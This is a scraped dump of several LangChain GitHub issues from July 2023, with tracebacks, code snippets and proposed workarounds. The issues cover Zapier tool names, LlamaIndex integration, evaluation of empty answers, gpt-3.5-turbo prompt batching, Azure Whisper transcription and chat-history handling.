</html> - 'functions.1.name' Traceback (most recent call last): File "/var/task/handler.py", line 152, in handle_chat chatResp = callChatModel(message, token) File "/var/task/handler.py", line 92, in callChatModel resp = agent.run(input=input) File "/var/task/langchain/chains/base.py", line 320, in run return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[ File "/var/task/langchain/chains/base.py", line 181, in __call__ raise e File "/var/task/langchain/chains/base.py", line 175, in __call__ self._call(inputs, run_manager=run_manager) File "/var/task/langchain/agents/agent.py", line 987, in _call next_step_output = self._take_next_step( File "/var/task/langchain/agents/agent.py", line 792, in _take_next_step output = self.agent.plan( File "/var/task/langchain/agents/openai_functions_agent/base.py", line 210, in plan predicted_message = self.llm.predict_messages( File "/var/task/langchain/chat_models/base.py", line 398, in predict_messages return self(messages, stop=_stop, **kwargs) File "/var/task/langchain/chat_models/base.py", line 348, in __call__ generation = self.generate( File "/var/task/langchain/chat_models/base.py", line 124, in generate raise e File "/var/task/langchain/chat_models/base.py", line 114, in generate self._generate_with_cache( File "/var/task/langchain/chat_models/base.py", line 261, in _generate_with_cache return self._generate( File "/var/task/langchain/chat_models/openai.py", line 371, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/var/task/langchain/chat_models/openai.py", line 319, in completion_with_retry return _completion_with_retry(**kwargs) File "/var/task/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/var/task/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/var/task/tenacity/__init__.py", line 314, in iter return fut.result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 
451, in result return self.__get_result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/var/task/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/var/task/langchain/chat_models/openai.py", line 317, in _completion_with_retry return self.client.create(**kwargs) File "/var/task/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/var/task/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/var/task/openai/api_requestor.py", line 298, in request resp, got_stream = self._interpret_response(result, stream) File "/var/task/openai/api_requestor.py", line 700, in _interpret_response self._interpret_response_line( File "/var/task/openai/api_requestor.py", line 763, in _interpret_response_line raise self.handle_error_response(
-- | --
```
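The error is OpenAI's function-calling API rejecting the Zapier tool name `Gmail: Send Email`, which doesn't match its `^[a-zA-Z0-9_-]{1,64}$` pattern (spaces and colons are not allowed). Until the toolkit handles this itself, one hedged workaround is to rename each tool before handing it to the agent — sketched here as a plain string sanitizer; applying it would mean setting `tool.name = sanitize_function_name(tool.name)` on each Zapier tool (my assumption about the integration point):

```python
import re


def sanitize_function_name(name: str) -> str:
    """Collapse characters OpenAI's function-name pattern rejects into
    underscores and cap the length at 64."""
    cleaned = re.sub(r"[^a-zA-Z0-9_-]+", "_", name).strip("_")
    return cleaned[:64] or "tool"
```

The original, human-readable name could still be kept in the tool's description so the model knows what the function does.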
### Expected behavior
I'd expect the agent chain to just execute | Zapier Toolkit and Function Agents not compatible | https://api.github.com/repos/langchain-ai/langchain/issues/7315/comments | 2 | 2023-07-07T01:38:10Z | 2023-10-14T20:10:42Z | https://github.com/langchain-ai/langchain/issues/7315 | 1,792,553,905 | 7,315 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
Python Documentation for Output Parser Unavailable
URL: https://python.langchain.com/docs/modules/prompts/output_parsers.html
### Idea or request for content:
I am currently taking the "Langchain/lesson/2/models, prompts, and parsers" course from deeplearning.ai. While working on the course material, I encountered difficulties with the output parser in Python. To seek assistance and better understand the usage of the output parser, I attempted to access the documentation for the Python implementation. However, I received a "page not found" error when trying to access the Python documentation. | DOC: Broken Python Information Link in Langchain Documentation | https://api.github.com/repos/langchain-ai/langchain/issues/7311/comments | 2 | 2023-07-07T00:02:09Z | 2023-07-07T16:31:22Z | https://github.com/langchain-ai/langchain/issues/7311 | 1,792,485,542 | 7,311 |
[
"langchain-ai",
"langchain"
] | ### System Info
I got error when try to load custom LLM for Llama-Index
```
# setup prompts - specific to StableLM
from llama_index.prompts.prompts import SimpleInputPrompt
system_prompt = """<|SYSTEM|># StableLM Tuned (Alpha version)
- StableLM is a helpful and harmless open-source AI language model developed by StabilityAI.
- StableLM is excited to be able to help the user, but will refuse to do anything that could be considered harmful to the user.
- StableLM is more than just an information source, StableLM is also able to write poetry, short stories, and make jokes.
- StableLM will refuse to participate in anything that could harm a human.
"""
# This will wrap the default prompts that are internal to llama-index
query_wrapper_prompt = SimpleInputPrompt("<|USER|>{query_str}<|ASSISTANT|>")
import torch
# imports below were missing from the snippet as pasted (paths per llama-index/langchain of that era)
from llama_index import LangchainEmbedding, ServiceContext, SimpleDirectoryReader, VectorStoreIndex
from llama_index.llms import HuggingFaceLLM
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.agents import AgentType
llm = HuggingFaceLLM(
context_window=4096,
max_new_tokens=256,
generate_kwargs={"temperature": 0.7, "do_sample": False, "return_dict_in_generate":True},
system_prompt=system_prompt,
query_wrapper_prompt=query_wrapper_prompt,
tokenizer_name="StabilityAI/stablelm-tuned-alpha-3b",
model_name="StabilityAI/stablelm-tuned-alpha-3b",
device_map="auto",
stopping_ids=[50278, 50279, 50277, 1, 0],
tokenizer_kwargs={"max_length": 4096},
)
# load in HF embedding model from langchain
embed_model = LangchainEmbedding(HuggingFaceEmbeddings())
service_context = ServiceContext.from_defaults(chunk_size=1024, llm=llm,embed_model=embed_model)
documents = SimpleDirectoryReader('data\\abnamro').load_data()
index = VectorStoreIndex.from_documents(documents, service_context=service_context,show_progress=True)
from langchain.agents import Tool
tools = [
Tool(
name="LlamaIndex",
func=lambda q: str(index.as_query_engine(
retriever_mode="embedding",
verbose=True,
service_context=service_context
).query(q)),
description="useful for when you want to answer questions about finance. The input to this tool should be a complete english sentence.",
return_direct=True,
),
]
from langchain.chains.conversation.memory import ConversationBufferMemory
from langchain.agents import initialize_agent
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
agent_executor = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,memory=memory
)
agent_executor.run(input="What is inflation in the Czech Republic?")
```
got
```
ValidationError Traceback (most recent call last)
Cell In[13], line 1
----> 1 agent_executor = initialize_agent(
2 tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,memory=memory
3 )
4 agent_executor.run(input="What is inflation in the Czech Republic?")
File F:\anaconda\lib\site-packages\langchain\agents\initialize.py:57, in initialize_agent(tools, llm, agent, callback_manager, agent_path, agent_kwargs, tags, **kwargs)
55 agent_cls = AGENT_TO_CLASS[agent]
56 agent_kwargs = agent_kwargs or {}
---> 57 agent_obj = agent_cls.from_llm_and_tools(
58 llm, tools, callback_manager=callback_manager, **agent_kwargs
59 )
60 elif agent_path is not None:
61 agent_obj = load_agent(
62 agent_path, llm=llm, tools=tools, callback_manager=callback_manager
63 )
File F:\anaconda\lib\site-packages\langchain\agents\conversational\base.py:115, in ConversationalAgent.from_llm_and_tools(cls, llm, tools, callback_manager, output_parser, prefix, suffix, format_instructions, ai_prefix, human_prefix, input_variables, **kwargs)
105 cls._validate_tools(tools)
106 prompt = cls.create_prompt(
107 tools,
108 ai_prefix=ai_prefix,
(...)
113 input_variables=input_variables,
114 )
--> 115 llm_chain = LLMChain(
116 llm=llm,
117 prompt=prompt,
118 callback_manager=callback_manager,
119 )
120 tool_names = [tool.name for tool in tools]
121 _output_parser = output_parser or cls._get_default_output_parser(
122 ai_prefix=ai_prefix
123 )
File F:\anaconda\lib\site-packages\langchain\load\serializable.py:74, in Serializable.__init__(self, **kwargs)
73 def __init__(self, **kwargs: Any) -> None:
---> 74 super().__init__(**kwargs)
75 self._lc_kwargs = kwargs
File F:\anaconda\lib\site-packages\pydantic\main.py:341, in pydantic.main.BaseModel.__init__()
ValidationError: 1 validation error for LLMChain
llm
value is not a valid dict (type=type_error.dict)
```
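If I'm reading the pydantic error right, the `ValidationError` comes from passing llama-index's `HuggingFaceLLM` where `initialize_agent`/`LLMChain` expect a LangChain `BaseLanguageModel` — the two libraries' LLM classes aren't interchangeable. The real fix would be subclassing LangChain's `LLM` base class (not shown here, and an assumption about the intended usage); the adapter idea in isolation is just:

```python
class CallableLLMShim:
    """Toy adapter: the agent layer ultimately needs one text-in/text-out
    call, so any backend can be bridged by forwarding to it. A real fix
    must subclass LangChain's LLM base class to satisfy pydantic."""

    def __init__(self, complete_fn):
        self._complete = complete_fn

    def predict(self, prompt: str) -> str:
        return self._complete(prompt)
```

Alternatively, the agent could use a LangChain-native chat model while the llama-index `HuggingFaceLLM` stays inside the query engine that the tool wraps.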
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Connect LlamaIndex with Langchain
### Expected behavior
Load custom LLM | Llama_index model as a tool for lang chain | https://api.github.com/repos/langchain-ai/langchain/issues/7309/comments | 5 | 2023-07-06T22:34:36Z | 2023-07-09T20:42:18Z | https://github.com/langchain-ai/langchain/issues/7309 | 1,792,391,896 | 7,309 |
[
"langchain-ai",
"langchain"
] | ### Feature request
It would be nice to add a maximal_marginal_relevance to the MongoDBAtlasVectorSearch vectorstore
### Motivation
This will bring help users to get more diverse results than the ones only based on the relevance score
### Your contribution
I'll write a PR | MongoDBAtlasVectorSearch vectorstore - add maximal_marginal_relevance method | https://api.github.com/repos/langchain-ai/langchain/issues/7304/comments | 2 | 2023-07-06T21:24:25Z | 2023-10-12T16:05:25Z | https://github.com/langchain-ai/langchain/issues/7304 | 1,792,265,347 | 7,304 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain version: 0.0.225
Python version: 3.8.5
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
When ground truth and model prediction are both empty strings, the evaluation model returns 'INCORRECT'. I expect the evaluation to return 'CORRECT'.
I ran the below piece of code.
```
llm_bit = AzureChatOpenAI(deployment_name='gpt-4-32k', temperature=0)
test_gt = [{'question': 'What is the name of the company?', 'gt': 'Company A'}, {'question': 'What is the name of the building', 'gt': ''}]
test_output = [{'question': 'What is the name of the company?', 'prediction': 'Company A'}, {'question': 'What is the name of the building', 'prediction': ''}]
eval_chain = QAEvalChain.from_llm(llm_bit)
temp = eval_chain.evaluate(
test_gt, test_output, question_key="question", answer_key="gt", prediction_key="prediction"
)
temp
```
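A possible workaround while the grading prompt behaves this way (hedged — this bypasses the LLM entirely for the degenerate case) is to short-circuit pairs where both ground truth and prediction are empty before calling `eval_chain.evaluate`:

```python
def grade_trivial_pair(ground_truth: str, prediction: str):
    """Return a verdict for degenerate pairs, or None to defer to the
    LLM-backed QAEvalChain."""
    if not ground_truth.strip() and not prediction.strip():
        return {"text": "CORRECT"}
    return None
```

Pairs that return `None` would be batched and sent to the evaluator as before.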
### Expected behavior
Received output: [{'text': 'CORRECT'}, {'text': 'INCORRECT'}]
Expected output: [{'text': 'CORRECT'}, {'text': 'CORRECT'}] | Evaluation returns 'INCORRECT' when ground truth is empty and prediction is empty | https://api.github.com/repos/langchain-ai/langchain/issues/7303/comments | 1 | 2023-07-06T21:20:21Z | 2023-10-12T16:05:30Z | https://github.com/langchain-ai/langchain/issues/7303 | 1,792,259,575 | 7,303 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
I have this code that I want to move to the gpt-3.5-turbo model, since it's 10 times cheaper than text-davinci-003, but I get this error:
```
ValueError: OpenAIChat currently only supports single prompt, got ["Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nW H I T E PA P E R\nTHE FUTURE OF ART\nRelease\nV 3 . 1\nTable of Contents\n01 Abstract 02 Riwa Tech\nPg 3\nPg
4\n03 Market research 04 Technology\nPg 5\nPg 7\n05 Why we do this 06 How Riwa Tech works\nPg 12\nPg 14\n07 The future 08 Team 09 Coin distribution 10 Business model 11 Timeline\nPg 20\nPg 21\nPg 22\nPg 24\nPg 26\n2\nAbstract\nArt and antiques have always been an integral part of the global economy, and\nthis remains true
today. With the rise of digital platforms and technologies,\ntransaction methods have been revolutionized, but challenges such as\nprovenance, authentication, protection and preservation of cultural heritage\npersist. This white paper proposes integrating blockchain technology to improve\nthe industry's landscape and protect its unique value. Blockchain can provide\nsecure, transparent, and tamper-proof records for art and antiques, addressing\nnumerous issues. By combining traditional values and innovative technology, we\nQuestion: hi\nRelevant text, if any:", 'Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nTag. The owners can know the current location anytime they want.\nBlockchain\nAppreciation, trading and collecting of artworks are gradually becoming a part of\npeople’s life pursuits. In the development of the art market industry, collectibles\nlack clear records of transactions and evidence systems that can be veri\x00ed,\nmaking it almost impossible to determine the source information of collectibles.\nCollectibles do not have an “ID” system, resulting in no records for artworks. This\nlack of traceability in the industry can easily lead to counterfeiters taking\nadvantage of the situation, resulting in a proliferation of counterfeit artworks and\naffecting the development of the industry.\nOwners who deposit collectibles to Riwa’s ecosystem will get NFTs backed by the\ncollectible. The NFT smart contract will inherit the basic and anti-counterfeit\ndetails. For every future transaction of
the collectible, the smart contract will\nQuestion: hi\nRelevant text, if any:', "Use the following portion of a long document to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nRiwa's advanced 3D technology to create 3D NFT collections and establish their\nown virtual spaces for exhibitions and other purposes.\n20\nTeam\nVIONA ZHANG Founder & chairman Experienced in commercializing artists and artworks, with a successful record in corporate and brand management.\nPIERRE BRUNETOT CEO Ex-CEO and founder of Sante Nature with extensive experience in marketing and strategy.\nYINJI DAI Co-Founder
& Sales Manager Manager of the Asia Region and Co-founder. Over 17 years of experience in art and antiques industry management.\nAASHIR IFTIKHAR Chief Technical Of\x00cer at HashPotato Over 3 years of experience in mobile application development. Expert in Full Stack development.\nEDOUARD BRUNETOT COO CEO of Cobound helps
businesses grow through marketing, sales, and customer service tools.\nFABIEN CERCLET Sales manager Over 7 years in blockchain tech & economics, established strong marketing foundation.\n21\nCoin distribution\nInitial Coin Offering (ICO)\nQuestion: hi\nRelevant text, if any:", "Use the following portion of a long document
to see if any of the text is relevant to answer the question. \nReturn any relevant text verbatim.\nand transaction reliability of artworks within the market.\n1. Riwa dual anti-counterfeiting\n1.1 Electronic Tag (E-Tag) management system\nRiwa's E-Tag technology management system is ef\x00cient, accurate and reliable.\nThe system can automatically read real-time artwork\ninformation and\ndynamically track and detect artwork locations through an electronic map,\nimproving the timeliness and accuracy of issue detection. Each Riwa E-Tag has a\nunique identity code assigned to the artwork or antique it represents, and the\ntags are physically
non-replicable and indestructible. With large storage capacity,\nlong service life, and adaptability to indoor and outdoor environments, Riwa's E-\nTag also allows contactless information collection, pollution resistance, and high\nreliability.\n7\nUsers can access the Riwa system by sensing an item's E-Tag with a smartphone,\nobtaining detailed features, inspection count, origin, ownership change records,\nQuestion: hi\nRelevant text, if any:"]
```
I'm using RetrievalQAWithSourcesChain and FAISS, this is the code
```python
import os
from langchain.document_loaders import UnstructuredURLLoader
from langchain.text_splitter import CharacterTextSplitter
import pickle
import faiss
from langchain.vectorstores import FAISS
from langchain.embeddings import OpenAIEmbeddings
from langchain.chains import RetrievalQAWithSourcesChain
from langchain.chains.question_answering import load_qa_chain
from langchain import OpenAI
os.environ["OPENAI_API_KEY"] = "Apikey"
urls = [
'https://riwa.nftify.network/collection/riwa-nft'
]
loaders = UnstructuredURLLoader(urls=urls)
data = loaders.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=200)  # splitter was undefined in the snippet; sizes assumed
docs = text_splitter.split_documents(data)
embeddings = OpenAIEmbeddings()
vectorStore_openAI = FAISS.from_documents(docs, embeddings)
with open("faiss_store_openai.pkl", "wb") as f:
pickle.dump(vectorStore_openAI, f)
with open("faiss_store_openai.pkl", "rb") as f:
VectorStore = pickle.load(f)
llm=OpenAI(temperature=0,model_name="gpt-3.5-turbo",max_tokens=32)
chain = RetrievalQAWithSourcesChain.from_llm(llm=llm, retriever=VectorStore.as_retriever())
question=input("What question do you want to ask? : ")
print(chain({"question": str(question)}, return_only_outputs=True)["answer"])
```
I would really appreciate it if someone could give me some guidance; I've been stuck on this problem for a while.
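From the error text, `OpenAI(model_name="gpt-3.5-turbo")` routes through the legacy `OpenAIChat` wrapper, which only accepts one prompt per call, while the map-reduce style chain sends several at once. Two hedged options: switch to `ChatOpenAI` from `langchain.chat_models` (which, as far as I can tell, is the intended class for chat models), or fall back to one call per prompt — the looping idea in isolation:

```python
def run_prompts_one_by_one(call_model, prompts):
    """Work around a single-prompt-only client by looping instead of
    sending the whole batch at once."""
    return [call_model(p) for p in prompts]
```

This is slower than a batched call but avoids the "only supports single prompt" `ValueError`.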
### Idea or request for content:
_No response_ | DOC: <ValueError: OpenAIChat currently only supports single prompt, got ["Use the following portion of a long document to see if any of the text is relevant to answer the question."]'DOC: ' prefix> | https://api.github.com/repos/langchain-ai/langchain/issues/7302/comments | 3 | 2023-07-06T21:08:00Z | 2023-11-24T16:08:09Z | https://github.com/langchain-ai/langchain/issues/7302 | 1,792,242,224 | 7,302 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain=0.0.225, python=3.9.17, openai=0.27.8
openai.api_type = "azure", openai.api_version = "2023-05-15"
api_base, api_key, deployment_name environment variables all configured.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the behavior:
Note: This code is pulled directly from the document loaders chapter of the LangChain "Chat With Your Data" course with Harrison Chase and Andrew Ng. It downloads an audio file of a public YouTube video and generates a transcript.
1. In a Jupyter notebook, configure your Azure OpenAI environment variables and add this code:
```
from langchain.document_loaders.generic import GenericLoader
from langchain.document_loaders.parsers import OpenAIWhisperParser
from langchain.document_loaders.blob_loaders.youtube_audio import YoutubeAudioLoader
```
2. Create and run a new cell with this inside:
```
url="https://www.youtube.com/watch?v=jGwO_UgTS7I"
save_dir="docs/youtube/"
loader = GenericLoader( YoutubeAudioLoader([url],save_dir), OpenAIWhisperParser() )
docs = loader.load()
```
3. At the transcribing step, it will fail with "InvalidRequestError".
Successfully executes the following steps:
```
[youtube] Extracting URL: https://www.youtube.com/watch?v=jGwO_UgTS7I
[youtube] jGwO_UgTS7I: Downloading webpage
[youtube] jGwO_UgTS7I: Downloading ios player API JSON
[youtube] jGwO_UgTS7I: Downloading android player API JSON
[youtube] jGwO_UgTS7I: Downloading m3u8 information
[info] jGwO_UgTS7I: Downloading 1 format(s): 140
[download] docs/youtube//Stanford CS229: Machine Learning Course, Lecture 1 - Andrew Ng (Autumn 2018).m4a has already been downloaded
[download] 100% of 69.76MiB
[ExtractAudio] Not converting audio docs/youtube//Stanford CS229: Machine Learning Course, Lecture 1 - Andrew Ng (Autumn 2018).m4a; file is already in target format m4a
Transcribing part 1!
```
```
InvalidRequestError Traceback (most recent call last)
Cell In[14], line 8
3 save_dir="docs/youtube/"
4 loader = GenericLoader(
5 YoutubeAudioLoader([url],save_dir),
6 OpenAIWhisperParser()
7 )
----> 8 docs = loader.load()
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/generic.py:90, in GenericLoader.load(self)
88 def load(self) -> List[Document]:
89 """Load all documents."""
---> 90 return list(self.lazy_load())
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/generic.py:86, in GenericLoader.lazy_load(self)
84 """Load documents lazily. Use this when working at a large scale."""
85 for blob in self.blob_loader.yield_blobs():
---> 86 yield from self.blob_parser.lazy_parse(blob)
File /usr/local/lib/python3.9/site-packages/langchain/document_loaders/parsers/audio.py:51, in OpenAIWhisperParser.lazy_parse(self, blob)
49 # Transcribe
50 print(f"Transcribing part {split_number+1}!")
---> 51 transcript = openai.Audio.transcribe("whisper-1", file_obj)
53 yield Document(
54 page_content=transcript.text,
55 metadata={"source": blob.source, "chunk": split_number},
56 )
File /usr/local/lib/python3.9/site-packages/openai/api_resources/audio.py:65, in Audio.transcribe(cls, model, file, api_key, api_base, api_type, api_version, organization, **params)
55 requestor, files, data = cls._prepare_request(
56 file=file,
57 filename=file.name,
(...)
62 **params,
63 )
64 url = cls._get_url("transcriptions")
---> 65 response, _, api_key = requestor.request("post", url, files=files, params=data)
66 return util.convert_to_openai_object(
67 response, api_key, api_version, organization
68 )
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:298, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
288 result = self.request_raw(
289 method.lower(),
290 url,
(...)
296 request_timeout=request_timeout,
297 )
--> 298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:700, in APIRequestor._interpret_response(self, result, stream)
692 return (
693 self._interpret_response_line(
694 line, result.status_code, result.headers, stream=True
695 )
696 for line in parse_stream(result.iter_lines())
697 ), True
698 else:
699 return (
--> 700 self._interpret_response_line(
701 result.content.decode("utf-8"),
702 result.status_code,
703 result.headers,
704 stream=False,
705 ),
706 False,
707 )
File /usr/local/lib/python3.9/site-packages/openai/api_requestor.py:763, in APIRequestor._interpret_response_line(self, rbody, rcode, rheaders, stream)
761 stream_error = stream and "error" in resp.data
762 if stream_error or not 200 <= rcode < 300:
--> 763 raise self.handle_error_response(
764 rbody, rcode, resp.data, rheaders, stream_error=stream_error
765 )
766 return resp
InvalidRequestError: Resource not found
```
Usually, with "resource not found" errors, the message tells you to supply an api_key or deployment_name. I'm not sure what it means here, as none of the loader methods take these as params.
### Expected behavior
Expected behavior is to finish four parts of transcription and "load" as doc in docs variable. | langchain.document_loaders.generic GenericLoader not working on Azure OpenAI - InvalidRequestError: Resource Not Found, cannot detect declared resource | https://api.github.com/repos/langchain-ai/langchain/issues/7298/comments | 5 | 2023-07-06T19:16:57Z | 2024-02-10T16:22:03Z | https://github.com/langchain-ai/langchain/issues/7298 | 1,792,095,489 | 7,298 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain: 0.0.225
OS: Arch Linux
Python: 3.11
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Using any of langchain's openai chat agents with the memory/chat-history feature results in the chat history/memory being sent to the OpenAI API in the SYSTEM message, and with incorrect roles specified.
### Expected behavior
While that might be appropriate for certain types of messages (maybe compressed or summarized from older conversations), I expected the chat history memory to be utilizing openai's [messages](https://platform.openai.com/docs/api-reference/chat#chat/create-messages) parameter.
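For reference, that parameter is just an ordered list of role-tagged dicts, which would also preserve each turn's correct role (a generic illustration of the OpenAI chat format, not langchain code):

```python
# Shape of the OpenAI chat `messages` parameter: ordered, role-tagged entries.
messages = [
    {"role": "system", "content": "You are a helpful assistant."},
    {"role": "user", "content": "Translate 'I love programming' to French."},
    {"role": "assistant", "content": "J'aime programmer."},
    {"role": "user", "content": "Now to German."},
]

# Each entry keeps its own role, so history never has to be flattened
# into the system prompt.
assert all(m["role"] in {"system", "user", "assistant"} for m in messages)
```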
It's much easier to parse (If ever needed) since it's an array of messages. This is related to https://github.com/hwchase17/langchain/issues/7285 which is an even bigger issue that addressing this one could resolve. | OpenAI Chat agents don't make use of OpenAI API `messages` parameter. | https://api.github.com/repos/langchain-ai/langchain/issues/7291/comments | 3 | 2023-07-06T17:42:57Z | 2023-10-14T20:10:48Z | https://github.com/langchain-ai/langchain/issues/7291 | 1,791,972,879 | 7,291 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain: v0.0.225
OS: Ubuntu 22.04
### Who can help?
@agola11
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
### Code
```python
from typing import Any, Optional, Sequence
from uuid import UUID

import langchain
from chromadb.config import Settings
from langchain.callbacks.streaming_stdout import BaseCallbackHandler
from langchain.chains import ConversationalRetrievalChain
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.llms import LlamaCpp
from langchain.memory import ConversationBufferMemory
from langchain.schema.document import Document
from langchain.vectorstores import Chroma
langchain.debug = True
class DocumentCallbackHandler(BaseCallbackHandler):
    def on_retriever_end(
        self,
        documents: Sequence[Document],
        *,
        run_id: UUID,
        parent_run_id: Optional[UUID] = None,
        **kwargs: Any,
    ) -> Any:
        print(f"on_retriever_end() CALLED with {len(documents)} documents")
def setup():
    llm = LlamaCpp(
        model_path="models/GPT4All-13B-snoozy.ggml.q5_1.bin",
        n_ctx=4096,
        n_batch=8192,
        callbacks=[],
        verbose=False,
        use_mlock=True,
        n_gpu_layers=60,
        n_threads=8,
    )
    embeddings = HuggingFaceEmbeddings(model_name="all-MiniLM-L6-v2")
    db = Chroma(
        persist_directory="./db",
        embedding_function=embeddings,
        client_settings=Settings(
            chroma_db_impl="duckdb+parquet",
            persist_directory="./db",
            anonymized_telemetry=False,
        ),
    )
    retriever = db.as_retriever(search_kwargs={"k": 4})
    memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
    return ConversationalRetrievalChain.from_llm(
        llm=llm, retriever=retriever, memory=memory, callbacks=[DocumentCallbackHandler()]
    )
def main():
    qa = setup()
    while True:
        question = input("\nEnter your question: ")
        answer = qa(question)["answer"]
        print(f"\n> Answer: {answer}")


if __name__ == "__main__":
    main()
```
### Output
```
ggml_init_cublas: found 1 CUDA devices:
Device 0: Quadro RTX 6000
llama.cpp: loading model from models/GPT4All-13B-snoozy.ggml.q5_1.bin
llama_model_load_internal: format = ggjt v2 (pre #1508)
llama_model_load_internal: n_vocab = 32000
llama_model_load_internal: n_ctx = 4096
llama_model_load_internal: n_embd = 5120
llama_model_load_internal: n_mult = 256
llama_model_load_internal: n_head = 40
llama_model_load_internal: n_layer = 40
llama_model_load_internal: n_rot = 128
llama_model_load_internal: ftype = 9 (mostly Q5_1)
llama_model_load_internal: n_ff = 13824
llama_model_load_internal: n_parts = 1
llama_model_load_internal: model size = 13B
llama_model_load_internal: ggml ctx size = 0.09 MB
llama_model_load_internal: using CUDA for GPU acceleration
llama_model_load_internal: mem required = 2165.28 MB (+ 1608.00 MB per state)
llama_model_load_internal: allocating batch_size x 1 MB = 512 MB VRAM for the scratch buffer
llama_model_load_internal: offloading 40 repeating layers to GPU
llama_model_load_internal: offloading non-repeating layers to GPU
llama_model_load_internal: offloading v cache to GPU
llama_model_load_internal: offloading k cache to GPU
llama_model_load_internal: offloaded 43/43 layers to GPU
llama_model_load_internal: total VRAM used: 11314 MB
....................................................................................................
llama_init_from_file: kv self size = 3200.00 MB
AVX = 1 | AVX2 = 1 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 1 | NEON = 0 | ARM_FMA = 0 | F16C = 1 | FP16_VA = 0 | WASM_SIMD = 0 | BLAS = 1 | SSE3 = 1 | VSX = 0 |
Enter your question: Should Hamlet end his life?
[chain/start] [1:chain:ConversationalRetrievalChain] Entering Chain run with input:
{
"question": "Should Hamlet end his life?",
"chat_history": []
}
[chain/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain] Entering Chain run with input:
[inputs]
[chain/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain] Entering Chain run with input:
{
"question": "Should Hamlet end his life?",
"context": "Enter Hamlet.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nHaply the seas, and countries different,\n With variable objects, shall expel\n This something-settled matter in his heart,\n Whereon his brains still beating puts him thus\n From fashion of himself. What think you on't?\n Pol. It shall do well. But yet do I believe\n The origin and commencement of his grief\n Sprung from neglected love.- How now, Ophelia?\n You need not tell us what Lord Hamlet said.\n We heard it all.- My lord, do as you please;"
}
[llm/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain > 5:llm:LlamaCpp] Entering LLM run with input:
{
"prompts": [
